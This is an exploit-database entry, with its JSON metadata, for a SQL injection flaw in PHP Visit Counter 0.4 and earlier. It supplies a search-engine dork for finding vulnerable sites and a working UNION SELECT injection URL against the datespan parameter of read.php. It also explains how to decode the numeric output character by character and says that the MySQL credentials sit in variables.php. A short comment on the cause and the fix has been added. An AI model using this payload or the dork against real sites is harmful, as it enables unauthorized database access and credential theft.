ID 1337DAY-ID-3091
Type zdt
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00
Description
Exploit for unknown platform in category web applications
===============================================================
PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability
===============================================================
###############################################################
#
# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#
# Vulnerability discovered by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack, Ciphercrew
# Date: 30.05.2008
#
###############################################################
#
# Dork: inurl:"read.php?datespan="
#
# Vulnerability:
#
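# 1.) SQL Injection via the `datespan` request parameter of read.php
#     (judging by the proof of concept below, the parameter value reaches the
#     SQL query unescaped; binding it as a query parameter or validating it
#     against the expected format before use closes the hole)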
#
# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
# Notes:
#
# The output is displayed as an integer, so you have to convert it to ASCII
# and read each character in turn to get the whole string.
# MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################
# 0day.today [2018-02-09] #
{"published": "2008-05-31T00:00:00", "id": "1337DAY-ID-3091", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-02-09T09:21:29", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-09T09:21:29", "rev": 2}, "vulnersScore": 0.6}, "type": "zdt", "lastseen": "2018-02-09T09:21:29", "edition": 2, "title": "PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3091", "modified": "2008-05-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/3091", "references": [], "reporter": "Lidloses_Auge", "sourceData": "===============================================================\r\nPHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n###############################################################\r\n#\r\n# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability\r\n# \r\n# Vulnerability discovered by: Lidloses_Auge \r\n# Greetz to: -=Player=- , Suicide, g4ms3, enco,\r\n# GPM, Free-Hack, Ciphercrew\r\n# Date: 30.05.2008\r\n#\r\n###############################################################\r\n# \r\n# Dork: inurl:\"read.php?datespan=\"\r\n#\r\n# Vulnerability:\r\n#\r\n# 1.) SQL Injection\r\n#\r\n# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*\r\n#\r\n# Notes:\r\n#\r\n# Output is displayed as INT, so you've to convert it into ascii and\r\n# scan every single letter to get the whole name.\r\n# MySQL Data is stored in [Counterpath]/variables.php\r\n#\r\n###############################################################\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-09] #"}
{}